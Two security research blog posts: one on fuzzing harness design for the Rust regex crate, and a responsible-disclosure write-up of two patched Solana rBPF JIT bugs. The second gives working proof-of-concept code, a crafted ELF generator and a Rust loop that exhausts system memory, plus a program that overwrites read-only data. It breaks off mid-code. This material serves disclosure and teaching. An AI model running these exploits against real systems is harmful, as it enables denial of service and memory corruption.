Normal view

There are new articles available, click to refresh the page.

Before yesterdayReverse Engineering

secret club
Ring Around The Regex: Lessons learned from fuzzing regex libraries (Part 1)addison 30 June 2024 at 22:00

Ring Around The Regex: Lessons learned from fuzzing regex libraries (Part 1)

30 June 2024 at 22:00

Okay, if you’re reading this, you probably know what fuzzing is. As an incredibly reductive summary: fuzzing is an automated, random testing process which tries to explore the state space (e.g., different interpretations of the input or behaviour) of a program under test (PUT; sometimes also SUT, DUT, etc.). Fuzzing is often celebrated as one of the most effective ways to find bugs in programs due to its inherently random nature, which defies human expectation or bias¹. The strategy has found countless security-critical bugs (think tens or hundreds of thousands) over its 30-odd-years of existence, and yet faces regular suspicion from industry and academia alike.

The bugs I’m going to talk about in this post are not security critical. The targets and bugs described below are instead offered as a study for fuzzing design decisions and understanding where fuzzing fails. I think this might be useful for people considering fuzz testing in both security and non-security contexts. If anything is poorly explained or incorrect, please reach out and I will happily make corrections, links, or add explanations as necessary.

In this blog post, I’m going to talk about the fuzzing of two very different regular expression libraries. For each, I’ll detail how I went about designing fuzzers for these targets, the usage of the fuzzers against these targets, the analysis and reporting of the bugs, and the maintainence of the fuzzers as automated regression testing tools.

Targets

Okay, our PUTs for today are:

We develop separate differential fuzzing harnesses for each that are dependent on the specific guarantees of each program.

Sidebar: What is regex?

If you have programmed anything dealing with string manipulation, you’ve almost certainly encountered regular expression (RegEx, or just regex) libraries. There are many forms of regular expressions, from the formal definitions to the many modern implementations, like the two discussed here. Modern “flavours” of regex often include quality-of-life features or extended capabilities not described in the original formal definitions, and as such actually represent greater formal constructs (e.g., I’m fairly confident that PCRE2 is capable of encoding something higher than a context-free grammar).

The purpose of these libraries is definitionally straightforward: to provide a language that can define patterns to search through text. Their implementation is rarely so straightforward, for two primary reasons:

Users demand expressive patterns by which to search text. Many different strategies must be made available by these libraries so that users may search and extract details from text effectively.
Text searching is often a hot path in text processing programs. Any implementation of regex must be implemented to process text extremely efficiently for any reasonable pattern.

I won’t give an overview of the writing and usage of regex here, as it’s mostly irrelevant for the rest of this. For those interested, you can find an overview of common features here.

Target 1: rust-lang/regex

The regex crate (hereon, rust-regex) is one of the most widely used crates in the entire Rust ecosystem. Its syntax is potentially more complex than some other engines due to its extended support of Unicode, but notably restricts itself to regular languages. rust-regex, unlike most other regex libraries, offers moderate complexity guarantees and is thus resistant (to a degree!) to certain malicious inputs.

I fuzzed rust-regex some time ago now (>2 years), but below is a brief summary of how I approached the software.

Analysis of the existing harness

A fuzzing harness (in most cases) is simply a function which accepts an input and runs it in the target. Ultimately, from the perspective of the user, the fuzzing process can be thought of as so:

the fuzzer runtime starts
the runtime produces some input
the harness is run with the new input; if an input causes a crash, stop
the runtime learns something about your program to make better inputs with
go to step 2

So, to be super explicit, we describe the fuzzer as the whole program which performs the fuzz testing, the fuzzer runtime as the code (typically not implemented by the user) which generates inputs and analyzes program behaviour, and the harness as the user code which actually manifests the test by calling the PUT. Having a poor fuzzer runtime means your program won’t be tested well. Having a poor harness means that the inputs produced by the runtime might not actually test much of the program, or may not test it very effectively.

Since we don’t want to make a custom fuzzer runtime and just want to test the program, let’s focus on improving the harness.

When I started looking into rust-regex, it was already in OSS-Fuzz. This means potentially thousands of CPU-years of fuzzing has already been performed on the target. Here, we’ll talk about two ways to find new bugs: better inputs and more ways to detect bugs. Both of these are directly affected by how one harnesses the PUT.

Here is the rust-regex harness as I originally saw it. This harness works by interpreting the first byte as a length field, then using that to determine where to split the remainder of the input as the search pattern and the “haystack” (text to be searched).

index                                      | meaning
------------------------------------------------------------
0                                          | length field
------------------------------------------------------------
[1, 1 + data[0] % (len(data) - 1))         | search pattern
------------------------------------------------------------
[1 + data[0] % (len(data) - 1), len(data)) | haystack

And, this works; for several years, this fuzzer was used in practice and found several bugs. But this harness has some problems, the biggest of which being: data reinterpretation over mutation.

Looking under the hood

Fuzzers, sadly, are not magic bug printers. The fuzzer runtime used here is libFuzzer, which performs random byte mutations and has no fundamental understanding of the program under test. In fact, the only thing the fuzzer really considers to distinguish the effects of different inputs is the coverage of the program². When an input is generated, it is only considered interesting (and therefore retained) if the program exhibits new coverage.

Moreover, inputs are not simply generated by libFuzzer. They are rather the result of mutation – the process of modifying an existing input to get a new input. Let’s break apart the loop we described earlier into finer steps (edits in bold):

the fuzzer runtime starts
the runtime selects some existing input from the corpus (the retained set of inputs); if none are available, generate one and go to 4
the runtime mutates the input
the harness is run with the new input; if an input causes a crash, stop
the runtime inspects the coverage of the last run; if the input caused a new code region to be explored, add it to the corpus
go to step 2

Understanding mutation

One of the underlying assumptions made about fuzzing with mutation is that a mutated input is similar to the input it’s based on, but different in interesting ways. But, what does it mean to be similar? What does it mean to be interestingly different?

In general, we would like to explore the PUT’s various ways of interpreting an input. We can’t³ magically generate inputs that get to places we haven’t explored before. Rather, we need to stepwise explore the program by slowly stepping across it.

Consider a classic demonstration program in fuzzing (pseudocode):

if (len(data) >= 1 && data[0] == 'a') {
 if (len(data) >= 2 && data[1] == 'b') {
  if (len(data) >= 3 && data[2] == 'c') {
   if (len(data) >= 4 && data[3] == 'd') {
    // bug!
   }
  }
 }
}

Suppose we want to hit the line that says “bug!”. We need to provide the program with an input that starts with abcd. If we simply generate random strings, the odds of producing such a string are at most 1 in 2^32 – roughly 1 in 4 billion. Not the best odds.

The promise of coverage-guided fuzzing is that, by mutation, we slowly explore the program and thus break down the problem into separate, easier to generate subproblems. Suppose that our runtime only applies mutations that randomly produce inputs with an edit distance of 1. Now, when we mutate our inputs, starting small, we can guess each 1 in 256 byte one at a time, and our runtime will progressively explore the program and get to the line that says “bug!” after solving this sequence of smaller subproblems.

The data reinterpretation problem

Let’s rewrite our harness slightly to be more representative of the rust-regex harness.

if (len(input) <= 1) {
 return;
}
data = input[1..];
offset = input[0] % len(data);
if (len(data) + offset >= 1 && data[offset] == 'a') {
 if (len(data) + offset >= 2 && data[offset + 1] == 'b') {
  if (len(data) + offset >= 3 && data[offset + 2] == 'c') {
   if (len(data) + offset >= 4 && data[offset + 3] == 'd') {
    // bug!
   }
  }
 }
}

This program is precisely the same “difficulty” as the original problem; we set input[0] = 0 and input[1..] to the solution from the original harness. Except, for coverage-guided fuzzers, this problem is orders of magnitude more difficult (reader encouraged to try!). Let’s look at how this program behaves over mutation; for clarity, raw bytes (like the offset field) will be written as [x] with x as the value in that byte.

Starting with some randomly generated input:

[123]c
  ^  ^
  |  |
  |  + first byte
  |
  + offset field; offset = 123 % len(input[1..]) = 123 % 1 = 0

This input is retained, because we have new coverage over the first few lines, but we don’t make it into the nested ifs just yet. Then, we mutate it until we find new coverage:

[123]a
  ^  ^
  |  |
  |  + first byte (passes our check!)
  |
  + offset field; offset = 123 % len(input[1..]) = 123 % 1 = 0

Great! We’ve hit the first if in the nested block. Unfortunately, with an edit distance of 1, we can now never trigger the bug. Suppose we get lucky and produce a b, which would have historically now passed the second condition:

[123]ab
  ^  ^^
  |  ||
  |  |+ first byte (fails the first check)
  |  |
  |  + skipped by offset
  |
  + offset field; offset = 123 % len(input[1..]) = 123 % 2 = 1

Because the offset is now reinterpreted by the program due to a change in length, the input is actually dissimilar to the original input from the perspective of the program. Even supposing we get lucky and get an a instead, the coverage of the resulting program doesn’t improve over the first mutated input and thus doesn’t get retained. If we change the offset to zero, then we don’t get new coverage because we still only have an a. With an edit distance of 1, we simply cannot actually produce any new coverage from this input.

This data reinterpretation problem is rampant across OSS-Fuzz harnesses, and mitigating the problems induced by this is a great place to start for people looking to improve existing harnesses. While, in practice, the edit distance of mutations is extremely large, the randomness produced by reinterpretation effectively reduces us all the way back to random generation (since we are nearly guaranteed to induce a reinterpretation by havoc mutations used by nearly all fuzzers). In rust-regex, the consequence of this reinterpretation problem is that regexes are wildly reinterpreted when inputs are small (as typically optimised-for by fuzzers) or when the first byte is mutated. Moreover, the pattern can never actually exceed 255 bytes (!).

Redesigning the harness

Okay, so we know that the existing harness has some problems. Let’s redesign the harness to clearly segment between “pattern” and “haystack” by structurally defining the input. We can use the handy dandy arbitrary crate to define a parser over arbitrary bytes to transform the input into a well-formed pattern and haystack. This, in turn, effectively makes mutations directly affect decisions made by the parser defined in arbitrary by making arbitrary act as an interpreter for the bits in the input, and mutations making changes to the decisions made by arbitrary⁴. As a user, this is simple, straightforward, and makes inputs much more “meaningful”; we now know that the bytes in our input represents a meaningful pattern.

You can find these changes in the merged changes by the author; change 1, change 2.

Did we solve the reinterpretation problem?

Interlude: grammar fuzzing vs byte fuzzing

Consider, for a second, a JSON parser. JSON is a very well-defined, structural language that aggressively rejects malformed inputs. Yet, byte-level mutational fuzzers with no awareness of the JSON format can produce well-formed JSON inputs by exploring the program space. That said, most mutations produced mangle the JSON input dramatically (e.g., in {"hello":"world"}, a mutation to {"hel"o":"world"} instantly makes the JSON parser reject the input). This limits the ability for byte-level mutational fuzzers to produce interesting inputs that test code behind a JSON interpreter.

Consider the following rendition of our earlier examples:

obj = JSON.loads(input); // lots of coverage in JSON to explore!

if (obj.a == 'a') {
  // bug!
}

Our byte-level mutational fuzzer will try to find as much code coverage as it can – and will mostly get lost in the weeds in the JSON step. Suppose we are “smart” and tell the fuzzer to magically ignore the coverage in JSON; now, the fuzzer will almost certainly never produce even a valid JSON input. As a result, we will never hit “bug!”.

But, suppose we wrote an arbitrary implementation that was capable of interpreting the random bytes produced by our mutational fuzzer valid objects with a field called “a”, before serialising it and handing it to the PUT. Now, we are effectively guaranteed to be able to produce an input that hits “bug!”, provided that our mutator is smart enough to figure out how to get the string “a” into that field.

Certainly, the mutator will easily do this, right?

Data Reinterpretation: Reloaded

Arbitrary, sadly, is not a magic input printer.

Internally, the parser itself defines various length fields throughout the parsing process which determine how the remainder of an input is processed. This makes the format of the input change dramatically with small changes to the input⁵, and thus, once again, the data reinterpretation problem emerges.

Worse, when we now deploy our fuzzer, the meaning of the inputs changes – so our thousands of CPU years of fuzzing in the past is now thrown away.

As it turns out, the data reinterpretation problem is probably unavoidable; without having mutations that are simply aware of the datatype, producing similar inputs is probably not possible. Even when directly mutating entries in the grammar (e.g., by simply replacing one subtree of the input with another), the edit distance is often huge. This invalidates the basic premise of our coverage-guided fuzzer, and as a result makes our fuzzer effectively useless.

Right?

Results

My arbitrary-based fuzzer was written in 30 minutes. I ran it for less than a minute before a testcase triggered CVE-2022-27413⁶ as a timeout in a release build of the fuzzer.

As it turns out, the mass reinterpretations of the input were not a problem – when arbitrary was used. Since the randomness induced by the mutations caused major reinterpretations of the input, a huge amount of the grammar of the inputs were explored. This effectively turned the mutator into a blackbox grammar generator, and the grammar was covered as a natural result of the covering of the program.

With the randomness constrained to valid inputs, it was only a matter of time before a valid input was spat out that met the exact preconditions for the bug. And, since, it’s found lots of other issues, too. I’ve even made differential fuzzers which have had success in identifying some consistency bugs between versions and sub-implementations.

So, we’ve found all the bugs now, right?

Takeaways

I recognise that this section is, frankly, a bit hard to interpret. We started out by saying that maintaining the similarity of inputs was important for coverage-based fuzzers, then ended by saying, “oh, it actually wasn’t if we were using arbitrary”. So, what is it?

The sad answer is simply that our testing is incomplete – and will always be incomplete. While we are now capable of producing well-formed, highly-complex, and interesting inputs quickly, we lack guidance when actually performing mutations. Our inputs are very dissimilar across mutations, and we likely suffer from the JSON loading problem I described earlier, where we can’t find the deeper bugs dependent on the result of the parsing.

It’s unclear whether we effectively test different matching strategies, too. While our inputs are now grand and complex, they may not be effectively testing the matching code since we don’t know how relevant our haystacks are to our patterns. The fuzzer has, resultantly, missed several crashes and incorrectnesses discovered by other users.

Finally, since the differential fuzzers are not actively in use, we rely entirely on assertions and crashes. In other words, we cannot find correctness issues at all. Even if differential fuzzers were enabled, there is no guarantee that they would catch all the issues, especially since we don’t explore the program space very well for matching.

I could ramble on for some time about other weaknesses of the fuzzers now in use here, but that’s neither here nor there. The main thing that you, dear reader, should consider is that how your fuzzer is internally trying to test the program and how much time you’re willing to spend to make the fuzzer work well. The fuzzer runtime is not magic and neither is the harness. You cannot expect it to reliably produce inputs that, as passed by your harness, will trigger bugs in your program. Moreover, you cannot expect that you will magically find bugs for which you have no means of detecting. You must critically think about how inputs will be generated, mutated, interpreted, and executed, and decide how much time you will spend to make the fuzzer effective for finding bugs in your target.

But almost certainly, byte-level mutations are not enough.

Target 2: PCRE2

Continued in Part 2, to be released 2024.07.15.

Mostly. Fuzzers can be overfit to certain applications, intentionally or not. ↩
This is not strictly accurate. libFuzzer collects lots of different types of information, but at its core is ultimately a coverage-guided fuzzer. ↩
Actually we kind of can, with symbolic execution, but this has its own problems that I’m not going into here. ↩
This was recently described to me in Caroline Lemieux’s keynote at SBFT’24, but for my life I cannot remember the citation, cannot find it in the recording, and cannot find it in Google easily. ↩
This isn’t actually commonly discussed as a problem of arbitrary. You can see this effect in several places. ↩
I originally believed that this was a violation of the complexity guarantees of rust-regex, though their complexity guarantees refer to the size of the pattern after it is compiled, or made ready for use. Instead, the issue was that the rust-regex compiler, which effectively translates a human-readable pattern to an intermediate representation which is then “executed” to perform the actual search operation. This representation has all repetitions expanded, meaning that the issue affects compilation before the guarantees were applied. The original implementation presumed that the memory growth of the intermediate representation represented the computational cost of the pattern compilation, whereas the testcase that was discovered had zero-sized items with many repetitions. This led to a large compilation time before the pattern could even be used. ↩

secret club
Earn $200K by fuzzing for a weekend: Part 2addison 11 May 2022 at 08:00

Earn $200K by fuzzing for a weekend: Part 2

secret club

By: addison

11 May 2022 at 08:00

Below are the writeups for two vulnerabilities I discovered in Solana rBPF, a self-described “Rust virtual machine and JIT compiler for eBPF programs”. These vulnerabilities were responsibly disclosed according to Solana’s Security Policy and I have permission from the engineers and from the Solana Head of Business Development to publish these vulnerabilities as shown below.

In part 1, I discussed the development of the fuzzers. Here, I will discuss the vulnerabilities as I discovered them and the process of reporting them to Solana.

Bug 1: Resource exhaustion

The first bug I reported to Solana was exceptionally tricky; it only occurs in highly specific circumstances, and the fact that the fuzzer discovered it at all is a testament to the incredible complexity of inputs a fuzzer can discover through repeated trials. The relevant crash was found in approximately two hours of fuzzer start.

Initial Investigation

The input that triggered the crash disassembles to the following assembly:

entrypoint:
  r0 = r0 + 255
  if r0 <= 8355838 goto -2
  r9 = r3 >> 3
  call -1

For whatever reason, this particular set of instructions causes a memory leak.

When executed, this program does the following steps, roughly:

increase r0 (which starts at 0) by 255
jump back to the previous instruction if r0 is less than or equal to 8355838
- this, in tandem with the first step, will cause the loop to execute 32767 times (a total of 65534 instructions)
set r9 to r3 * 2^3, which is going to be zero because r3 starts at zero
calls a nonexistent function
- the nonexistent function should trigger an unknown symbol error

What stood out to me about this particular test case is how incredibly specific it was; varying the addition of 255 or 8355838 by even a small amount caused the leak to disappear. It was then I remembered the following line from my fuzzer:

let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };

remaining, here, refers to the number of instructions remaining before the program is forceably terminated. As a result, the leaking program was running out this meter at exactly the call instruction.

A faulty optimisation

There is a wall of text at line 420 of jit.rs which suitably describes an optimisation that Solana applied in order to reduce the frequency at which they need to update the instruction meter.

The short version is that they only update or check the instruction meter when they reach the end of a block or a call in order to reduce the amount of times they update and check the meter. This optimisation is totally reasonable; we don’t care if we run out of instructions at the middle of a block because the subsequent instructions are still “safe”, and if we ever hit an exit that’s the end of a block anyway. In other words, this optimisation should have no effect on the final state of the program.

The issue can be seen in the patch for the vulnerability, where the maintainer moved line 1279 to line 1275. To understand why that’s relevant, let’s walk through our execution again:

increase r0 (which starts at 0) by 255
jump back to the previous instruction if r0 is less than or equal to 8355838
- this, in tandem with the first step, will cause the loop to execute 32767 times (a total of 65534 instructions)
- our meter updates here
set r9 to r3 * 2^3, which is going to be zero because r3 starts at zero
calls a nonexistent function
- the nonexistent function should trigger an unknown symbol error, but that doesn’t happen because our meter updates here and emits a max instructions exceeded error

However, based on the original order of the instructions, what happens in the call is the following:

invoke the call, which fails because the symbol is unresolved
to report the unresolved symbol, we invoke that report_unresolved_symbol function, which returns the name of the symbol invoked (or “Unknown”) in a heap-allocated string
the pc is updated
the instruction count is validated, which overwrites the unresolved symbol error and terminates execution

Because the unresolved symbol error is merely overwritten, the value is never passed to the Rust code which invoked the JIT program. As a result, the reference to the heap-allocated String is lost and never dropped. Thus: any pointer to that heap allocation is lost and will never be freed, leading to the leak.

That being said, the leak is only seven bytes per execution of the program. Without causing a larger leak, this isn’t particularly exploitable.

Weaponisation

Let’s take a closer look at report_unresolved_symbol.

report_unresolved_symbol source

pub fn report_unresolved_symbol(&self, insn_offset: usize) -> Result<u64, EbpfError<E>> {
    let file_offset = insn_offset
        .saturating_mul(ebpf::INSN_SIZE)
        .saturating_add(self.text_section_info.offset_range.start as usize);

    let mut name = "Unknown";
    if let Ok(elf) = Elf::parse(self.elf_bytes.as_slice()) {
        for relocation in &elf.dynrels {
            match BpfRelocationType::from_x86_relocation_type(relocation.r_type) {
                Some(BpfRelocationType::R_Bpf_64_32) | Some(BpfRelocationType::R_Bpf_64_64) => {
                    if relocation.r_offset as usize == file_offset {
                        let sym = elf
                            .dynsyms
                            .get(relocation.r_sym)
                            .ok_or(ElfError::UnknownSymbol(relocation.r_sym))?;
                        name = elf
                            .dynstrtab
                            .get_at(sym.st_name)
                            .ok_or(ElfError::UnknownSymbol(sym.st_name))?;
                    }
                }
                _ => (),
            }
        }
    }
    Err(ElfError::UnresolvedSymbol(
        name.to_string(),
        file_offset
            .checked_div(ebpf::INSN_SIZE)
            .and_then(|offset| offset.checked_add(ebpf::ELF_INSN_DUMP_OFFSET))
            .unwrap_or(ebpf::ELF_INSN_DUMP_OFFSET),
        file_offset,
    )
    .into())
}

Note how the name is the string which becomes heap allocated. The value of the name is determined by a relocation lookup in the ELF, which we can actually control if we compile our own malicious ELF. Even though the fuzzer only tests the JIT operations, one of the intended ways to load a BPF program is as an ELF, so it seems like something that would certainly be in scope.

Crafting the malicious ELF

To create an unresolved relocation in BPF, it’s actually quite simple. We just need to create a function with a very, very long name that isn’t actually defined, only declared. To do so, I created two files to craft the malicious ELF:

evil.h

evil.h is far too large to post here, as it has a function name that is approximately a mebibyte long. Instead, it was generated with the following bash command.

$ echo "#define EVIL do_evil_$(printf 'a%.0s' {1..1048576})

void EVIL();
" > evil.h

evil.c

#include "evil.h"

void entrypoint() {
  asm("	goto +0\n"
      "	r0 = 0\n");
  EVIL();
}

Note that goto +0 is used here because we’ll use a specialised instruction meter that only can do two instructions.

Finally, we’ll also make a Rust program to load and execute this ELF just to make sure the maintainers are able to replicate the issue.

elf-memleak.rs

You won’t be able to use this particular example anymore as rBPF has changed a lot of its API since the time this was created. However, you can check out version v0.22.21, which this exploit was crafted for.

Note in particular the use of an instruction meter with two remaining.

use std::collections::BTreeMap;
use std::fs::File;
use std::io::Read;

use solana_rbpf::{elf::{Executable, register_bpf_function}, insn_builder::IntoBytes, vm::{Config, EbpfVm, TestInstructionMeter, SyscallRegistry}, user_error::UserError};
use solana_rbpf::insn_builder::{Arch, BpfCode, Cond, Instruction, MemSize, Source};

use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::verifier::check;

fn main() {
    let mut file = File::open("tests/elfs/evil.so").unwrap();
    let mut elf = Vec::new();
    file.read_to_end(&mut elf).unwrap();
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut syscall_registry = SyscallRegistry::default();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscall_registry).unwrap();
    if Executable::jit_compile(&mut executable).is_ok() {
        for _ in 0.. {
            let mut jit_mem = [0; 65536];
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 2 };
            jit_vm.execute_program_jit(&mut jit_meter).ok();
        }
    }
}

With our malicious ELF that has a function name that’s a mebibyte long, the report_unresolved_symbol will set that name variable to the long function name. As a result, the allocated string will leak a whole mebibyte of memory per execution rather than the measly seven bytes. When performed in this loop, the entire system’s memory will be exhausted in mere moments.

Reporting

Okay, so now that we’ve crafted the exploit, we should probably report it to the vendor.

A quick Google later and we find the Solana security policy. Scrolling through, it says:

DO NOT CREATE AN ISSUE to report a security problem. Instead, please send an email to [email protected] and provide your github username so we can add you to a new draft security advisory for further discussion.

Okay, reasonable enough. Looks like they have bug bounties too!

DoS Attacks: $100,000 USD in locked SOL tokens (locked for 12 months)

Woah. I was working on rBPF out of curiosity, but it seems that there’s quite a bounty made available here.

I sent in my bug report via email on January 31st, and, within just three hours, Solana acknowledged the bug. Below is the report as submitted to Solana:

Report for bug 1 as submitted to Solana

There is a resource exhaustion vulnerability in solana_rbpf (specifically in src/jit.rs) which affects JIT-compiled eBPF programs (both ELF and insn_builder programs). An adversary with the ability to load and execute eBPF programs may be able to exhaust memory resources for the program executing solana_rbpf JIT-compiled programs.

The vulnerability is introduced by the JIT compiler’s emission of an unresolved symbol error when attempting to call an unknown hash after exceeding the instruction meter limit. The rust call emitted to Executable::report_unresolved_symbol allocates a string (“Unknown”, or the relocation symbol associated with the call) using .to_string(), which performs a heap allocation. However, because the rust call completes with an instruction meter subtraction and check, the check causes the early termination of the program with Err(ExceededMaxInstructions(_, _)). As a result, the reference to the error which contains the string is lost and thus the string is never dropped, leading to a heap memory leak.

The following eBPF program demonstrates the vulnerability:

entrypoint:
    goto +0
    r0 = 0
    call -1

where the tail call’s immediate argument represents an unknown hash (this can be compiled directly, but not disassembled) and with a instruction meter set to 2 instructions remaining.

The optimisation used in jit.rs to only update the instruction meter is triggered after the ja instruction, and subsequently the mov64 instruction does not update the instruction meter despite the fact that it should prevent further execution here. The call instruction then performs a lookup for the non-existent symbol, leading to the execution of Executable::report_unresolved_symbol which performs the allocation. The call completes and updates the instruction meter again, now emitting the ExceededMaxInstructions error instead and losing the reference to the heap-allocated string.

While the leak in this example is only 7 bytes per error emitted (as the symbol string loaded is “Unknown”), one could craft an ELF with an arbitrarily sized relocation entry pointing to the call’s offset, causing a much faster exhaustion of memory resources. Such an example is attached with source code. I was able to exhaust all memory on my machine within a few seconds by simply repeatedly jit-executing this binary. A larger relocation entry could be crafted, but I think the example provided makes the vulnerability quite clear.

Attached is a Rust file (elf-memleak.rs) which may be placed within the examples/ directory of solana_rbpf in order to test the evil.{c,h,so} provided. It is highly recommend to run this for a short period of time and cancelling it quickly, as it quickly exhausts memory resources for the operating system.

Additionally, one could theoretically trigger this behaviour in programs not loaded by the attacker by sending crafted payloads which cause this meter misbehaviour. However, this is unlikely because one would also need to submit such a payload to a target which has an unresolved symbol.

For these reasons, I propose that this bug be classified under DoS Attacks (Non-RPC).

Solana classified this bug as a Denial-of-Service (Non-RPC) and awarded $100k.

Bug 2: Persistent .rodata corruption

The second bug I reported was easy to find, but difficult to diagnose. While the bug occurred with high frequency, it was unclear as to what exactly what caused the bug. Past that, was it even exploitable or useful?

Initial Investigation

The input that triggered the crash disassembles to the following assembly:

entrypoint:
    or32 r9, -1
    mov32 r1, -1
    stxh [r9+0x1], r0
    exit

The crash type triggered was a difference in JIT vs interpreter exit state; JIT terminated with Ok(0), whereas interpreter terminated with:

Err(AccessViolation(31, Store, 4294967296, 2, "program"))

Spicy stuff. Looks like our JIT implementation has some form of out-of-bounds write. Let’s investigate a bit further.

The first thing of note is the access violation’s address: 4294967296. In other words, 0x100000000. Looking at the Solana documentation, we see that this address corresponds to program code. Are we writing to JIT’d code??

The answer, dear reader, is unfortunately no. As exciting as the prospect of arbitrary code execution might be, this actually refers to the BPF program code – more specifically, it refers to the read-only data present in the ELF provided. Regardless, it is writing to a immutable reference to a Vec somewhere that represents the program code, which is supposed to be read-only.

So why isn’t it?

The curse of x86

Let’s make our payload more clear and execute directly, then pop it into gdb to see exactly what code the JIT compiler is generating. I used the following program to test for OOB write:

oob-write.rs

This code likely no longer works due to changes in the API of rBPF changing in recent releases. Try it in examples/ in v0.2.22, where the vulnerability is still present.

use std::collections::BTreeMap;
use solana_rbpf::{
    elf::Executable,
    insn_builder::{
        Arch,
        BpfCode,
        Instruction,
        IntoBytes,
        MemSize,
        Source,
    },
    user_error::UserError,
    verifier::check,
    vm::{Config, EbpfVm, SyscallRegistry, TestInstructionMeter},
};
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::error::UserDefinedError;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::vm::InstructionMeter;

fn dump_insns<E: UserDefinedError, I: InstructionMeter>(executable: &Executable<E, I>) {
    let analysis = Analysis::from_executable(executable);
    // eprint!("Using the following disassembly");
    analysis.disassemble(&mut std::io::stdout()).unwrap();
}

fn main() {
    let config = Config::default();
    let mut code = BpfCode::default();
    let mut jit_mem = Vec::new();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&mut bpf_functions, 0, "entrypoint", false).unwrap();
    code
        .load(MemSize::DoubleWord).set_dst(9).push()
        .load(MemSize::Word).set_imm(1).push()
        .store_x(MemSize::HalfWord).set_dst(9).set_off(0).set_src(0).push()
        .exit().push();
    let mut prog = code.into_bytes();
    assert!(check(prog, &config).is_ok());
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(prog, None, config, SyscallRegistry::default(), bpf_functions).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    dump_insns(&executable);
    let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
    let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
    let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
    if let Ok(_) = jit_res {
        eprintln!("{} => {:?} ({:?})", 0, jit_res, &jit_mem);
    }
}

This just sets up and executes the following BPF assembly:

entrypoint:
    lddw r9, 0x100000000
    stxh [r9+0x0], r0
    exit

This assembly simply writes a 0 to 0x100000000.

For the next part: please, for the love of god, use GEF.

$ cargo +stable build --example oob-write
$ gdb ./target/debug/examples/oob-write
gef➤  break src/vm.rs:1061 # after the JIT'd code is prepared
gef➤  run
gef➤  print self.executable.ro_section.buf.ptr.pointer 
gef➤  awatch *$1 # break if we modify the readonly section
gef➤  record full # set up for reverse execution
gef➤  continue

After that last continue, we effectively execute until we hit the write access to our read-only section. Additionally, we can step backwards in the program until we find our faulty behaviour.

The watched memory is written to as a result of this X86 store instruction (as a reminder, we this is the branch for stxh). Seeing this emit_address_translation call above it, we can determine that that function likely handles the address translation and readonly checks.

Further inspection shows that emit_address_translation actually emits a call to… something:

emit_call(jit, TARGET_PC_TRANSLATE_MEMORY_ADDRESS + len.trailing_zeros() as usize + 4 * (access_type as usize))?;

Okay, so this is some kind of global offset for this JIT program to translate the memory address. By searching for TARGET_PC_TRANSLATE_MEMORY_ADDRESS elsewhere in the program, we find a loop which initialises different kinds of memory translations.

Scrolling through this, we find our access check:

X86Instruction::cmp_immediate(OperandSize::S8, RAX, 0, Some(X86IndirectAccess::Offset(25))).emit(self)?; // region.is_writable == 0

Okay – so the x86 cmp instruction to find is one that uses a destination of [rax+0x19]. A couple rsi later to find such an instruction and we find:

cmp    DWORD PTR [rax+0x19], 0x0

Which is, notably, not using an 8-bit operand as the cmp_immediate call suggests. So what’s going on here?

x86 cmp operand size woes

Here is the definition of X86Instruction::cmp_immediate:

pub fn cmp_immediate(
    size: OperandSize,
    destination: u8,
    immediate: i64,
    indirect: Option<X86IndirectAccess>,
) -> Self {
    Self {
        size,
        opcode: 0x81,
        first_operand: RDI,
        second_operand: destination,
        immediate_size: OperandSize::S32,
        immediate,
        indirect,
        ..Self::default()
    }
}

This creates an x86 instruction with the opcode 0x81. Inspecting closer and cross-referencing with an x86-64 opcode reference, you can find that opcode 0x81 is only defined for 16-, 32-, and 64-bit register operands. If you want to use an 8-bit register operand, you’ll need to use the 0x80 opcode variant.

This is precisely the patch applied.

A quick side note about testing code with different compilers

This bug actually was a bit weirder than it seems at first. Due to differences in Rust struct padding between versions, at the time that I reported the bug, the difference was spurious in stable release. As a result, it’s quite likely that no one would have noticed the bug until the next Rust release version.

From my report:

It is likely that this bug was not discovered earlier due to inconsistent behaviour between various versions of Rust. During testing, it was found that stable release did not consistently have non-zero field padding where stable debug, nightly debug, and nightly release did.

Proof of concept

Alright, now to create a PoC so that the people inspecting the bug can validate it. Like last time, we’ll create an ELF, along with a few different demonstrations of the effects of the bug. Specifically, we want to demonstrate that read-only values in the BPF target can be modified persistently, as our writes affect the executable and thus all future executions of the JIT program.

value_in_ro.c

This program should fail, as the data to be overwritten should be read-only. It will be executed by howdy.rs.

typedef unsigned char uint8_t;
typedef unsigned long int uint64_t;

extern void log(const char*, uint64_t);

static const char data[] = "howdy";

extern uint64_t entrypoint(const uint8_t *input) {
  log(data, 5);
  char *overwritten = (char *)data;
  overwritten[0] = 'e';
  overwritten[1] = 'v';
  overwritten[2] = 'i';
  overwritten[3] = 'l';
  overwritten[4] = '!';
  log(data, 5);

  return 0;
}

howdy.rs

This program loads the compiled version of value_in_ro.c and attaches a log syscall so that we can see the behaviour internally. I confirmed that this syscall did not affect the runtime behaviour.

use std::collections::BTreeMap;
use std::fs::File;
use std::io::Read;
use solana_rbpf::{
    elf::Executable,
    insn_builder::{
        BpfCode,
        Instruction,
        IntoBytes,
        MemSize,
    },
    user_error::UserError,
    verifier::check,
    vm::{Config, EbpfVm, SyscallRegistry, TestInstructionMeter},
};
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::error::UserDefinedError;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::vm::{InstructionMeter, SyscallObject};

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut jit_mem = vec![0; 32];
    let mut elf = Vec::new();
    File::open("tests/elfs/value_in_ro.so").unwrap().read_to_end(&mut elf);
    let mut syscalls = SyscallRegistry::default();
    syscalls.register_syscall_by_name(b"log", solana_rbpf::syscalls::BpfSyscallString::call);
